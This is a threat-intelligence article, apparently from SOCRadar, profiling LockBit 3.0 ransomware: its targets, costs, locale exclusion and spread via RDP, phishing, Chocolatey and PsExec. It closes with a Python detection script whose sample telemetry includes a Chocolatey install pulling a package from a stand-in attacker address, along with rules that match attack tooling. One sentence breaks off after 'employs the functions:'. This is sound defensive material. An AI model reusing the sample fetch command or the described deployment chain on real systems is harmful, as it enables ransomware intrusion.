The frequency of ransomware attacks is on the rise every year. A single group, the LockBit Ransomware Group, is accountable for over one-third of all ransomware attacks in the second half of the previous year and the first quarter of 2023. The LockBit Ransomware Group was first observed in September 2019; it became the most active ransomware group of 2022 with the shutdown of Conti, and as of the first quarter of 2023 it still stands out as the most active ransomware group. The group, which has over 1,500 victim announcement records on the SOCRadar platform, broke the record in the first quarter of 2023 as the most active ransomware group by far, with over 300 announced victims.

Atento, a CRM company, reported the impact of an attack by LockBit as $42.1 million in its financial performance report published in 2021: $34.8 million was due to revenue loss, and $7.3 million was mitigation expenses. Even if these astronomical numbers vary from company to company, the total financial loss caused by LockBit's malicious acts can exceed billions of dollars.

LockBit discloses its victims on its leak site and sets a deadline for the ransom.

LockBit 3.0 infects the target system only if the system's language is not on its exclusion list. Excluded languages include the local languages of Russian-influenced countries and the languages of Russian-allied countries. To confirm the location of the targeted system, LockBit ransomware employs the functions:

It cross-checks the result against a set of countries, and if the locale does not match any of the specified countries, the malware proceeds to the subsequent verification step. Although the ransomware group claims not to engage in politics, many of its targets appear to be NATO and allied countries. Some of the excluded languages are Romanian (Moldova), Arabic (Syria), and Tatar (Russia), but this is not an exhaustive list.

Findings on LockBit 3.0 Ransomware

According to SOCRadar data, about half of the attacks with the LockBit 3.0 variant affect US companies.

[Figure: Top targeted industries by LockBit 3.0]

LockBit 3.0, a Ransomware-as-a-Service (RaaS), has several options for configuring its behavior during compilation. Once it is executed on a victim's system, affiliates can further modify its behavior with additional arguments, such as lateral movement or safe mode. If affiliates lack access to the passwordless version of the ransomware, they must provide a password during execution; the supplied cryptographic key decodes the ransomware's executable, which protects the encoded file uploaded to the target system.

LockBit 3.0 affiliates use diverse methods for initial access, including exploiting RDP, launching phishing campaigns, and exploiting vulnerabilities in public-facing applications. Using the open-source package installer Chocolatey to install and execute malicious payloads is a recurring feature in LockBit 3.0 attacks, likely employed to evade detection. To spread through a victim network, LockBit 3.0 uses hardcoded credentials or compromised local accounts with elevated privileges; over the Server Message Block (SMB) protocol, it can also spread via Group Policy Objects and PsExec. After encryption, LockBit 3.0 drops a ransom note and changes the host's wallpaper and icons to LockBit branding. It may also send encrypted host and bot information to a command and control server.

[Figure: An overview of a typical LockBit operation. (Source: Australian Cyber Security Center)]

Conclusion

LockBit 3.0 is a highly active and expanding Ransomware-as-a-Service (RaaS) group that has victimized thousands of organizations worldwide and employs a wide range of tactics, techniques, and procedures owing to its large number of affiliates. Its targeting of many countries and sectors, and its efforts to increase the number of systems it can infect, show that it poses a significant danger to all organizations. Moreover, there is a high probability that the number of victims and the target pool will keep growing, leading to a notable upsurge in LockBit attacks in the coming days, especially if the group manages to become the first notable ransomware affecting IOS devices. LockBit affiliates commonly use phishing campaigns to gain initial access for their ransomware attacks. To counter this, organizations can use SOCRadar's Digital Risk Protection for brand protection, which proactively denies potential phishing campaigns that impersonate their domains.

MITRE ATT&CK TTPs

Execution Guardrails: Environmental Keying
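The deployment chain described above (Chocolatey used to stage payloads, PsExec over SMB for lateral movement, and the wallpaper change after encryption) leaves telemetry a SOC can match on. The following is an added detection example written for this page, not code from SOCRadar or from any LockBit analysis. It assumes an event stream of one JSON record per line loosely modelled on Windows Security event 4688 (process creation), System event 7045 (service installed) and Sysmon event 13 (registry value set); the hostnames, users, paths, the 203.0.113.9 address, the Chocolatey feed allow-list and the list of processes expected to write the wallpaper value are all constructed or assumed for the example.

```python
import json
import re
from collections import defaultdict

# Constructed sample telemetry, one JSON record per line, loosely modelled on
# Windows Security event 4688 (process creation), System event 7045 (service
# installed) and Sysmon event 13 (registry value set). Hostnames, users, paths
# and the 203.0.113.9 address are made up for this example.
SAMPLE_EVENTS = r"""
{"event_id": 7045, "host": "SRV-02", "service_name": "PSEXESVC", "image": "%SystemRoot%\\PSEXESVC.exe"}
{"event_id": 4688, "host": "WS-17", "user": "CORP\\jdoe", "image": "C:\\ProgramData\\chocolatey\\choco.exe", "cmdline": "choco install updater -y --source http://203.0.113.9/repo"}
{"event_id": 4688, "host": "WS-05", "user": "CORP\\it-admin", "image": "C:\\ProgramData\\chocolatey\\choco.exe", "cmdline": "choco install 7zip -y --source https://community.chocolatey.org/api/v2/"}
{"event_id": 13, "host": "SRV-02", "image": "C:\\Users\\Public\\payload.exe", "target_object": "HKU\\S-1-5-21-1111-2222-3333-1001\\Control Panel\\Desktop\\Wallpaper"}
{"event_id": 13, "host": "WS-05", "image": "C:\\Windows\\explorer.exe", "target_object": "HKU\\S-1-5-21-1111-2222-3333-1005\\Control Panel\\Desktop\\Wallpaper"}
{"event_id": 7045, "host": "WS-05", "service_name": "BackupAgent", "image": "C:\\Program Files\\BackupAgent\\agent.exe"}
"""

# Assumed organisational policy: the only Chocolatey feed that should appear in
# a "choco install --source" command line. Adjust to the feeds you actually use.
ALLOWED_CHOCO_SOURCES = {"https://community.chocolatey.org/api/v2"}

# Assumed set of processes that legitimately rewrite the per-user wallpaper value.
EXPECTED_WALLPAPER_WRITERS = {"explorer.exe", "systemsettings.exe"}

SOURCE_RE = re.compile(r"--source[= ]\s*(\S+)", re.IGNORECASE)


def basename(path):
    """Last component of a Windows or POSIX path, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()


def rule_psexec_service(ev):
    """Service install whose name or binary is the PsExec service (PSEXESVC)."""
    if ev.get("event_id") != 7045:
        return False
    haystack = (ev.get("service_name", "") + " " + ev.get("image", "")).upper()
    return "PSEXESVC" in haystack


def rule_choco_untrusted_source(ev):
    """choco install pulling a package from a feed outside the allow-list."""
    if ev.get("event_id") != 4688 or basename(ev.get("image", "")) != "choco.exe":
        return False
    cmdline = ev.get("cmdline", "")
    if not re.search(r"\binstall\b", cmdline):
        return False
    m = SOURCE_RE.search(cmdline)
    if m is None:
        return False  # default feed; treated as allowed in this example
    return m.group(1).rstrip("/") not in ALLOWED_CHOCO_SOURCES


def rule_wallpaper_unexpected_writer(ev):
    """Wallpaper registry value set by something other than the shell or settings app."""
    if ev.get("event_id") != 13:
        return False
    target = ev.get("target_object", "").lower()
    if not target.endswith("\\control panel\\desktop\\wallpaper"):
        return False
    return basename(ev.get("image", "")) not in EXPECTED_WALLPAPER_WRITERS


RULES = [
    ("psexec_service_install", rule_psexec_service),
    ("chocolatey_untrusted_source", rule_choco_untrusted_source),
    ("wallpaper_set_by_unexpected_process", rule_wallpaper_unexpected_writer),
]


def analyze(event_lines):
    """Map each host to the sorted list of rule names that fired on its events."""
    hits = defaultdict(set)
    for line in event_lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        for name, rule in RULES:
            if rule(ev):
                hits[ev["host"]].add(name)
    return {host: sorted(names) for host, names in hits.items()}


def triage(event_lines, min_rules=2):
    """Hosts on which at least min_rules distinct indicators fired, sorted by name."""
    return sorted(h for h, names in analyze(event_lines).items() if len(names) >= min_rules)


if __name__ == "__main__":
    for host, names in analyze(SAMPLE_EVENTS).items():
        print(host, names)
    print("escalate:", triage(SAMPLE_EVENTS))
```

On the constructed sample, SRV-02 triggers both the PsExec service install and the wallpaper rewrite by an unexpected binary, so `triage` escalates it, while WS-17 only shows a Chocolatey install from a non-allow-listed feed and stays a single-indicator finding. Each rule on its own is noisy (administrators use PsExec and Chocolatey legitimately); the value is in the per-host correlation, which is why `triage` escalates only when several distinct indicators coincide.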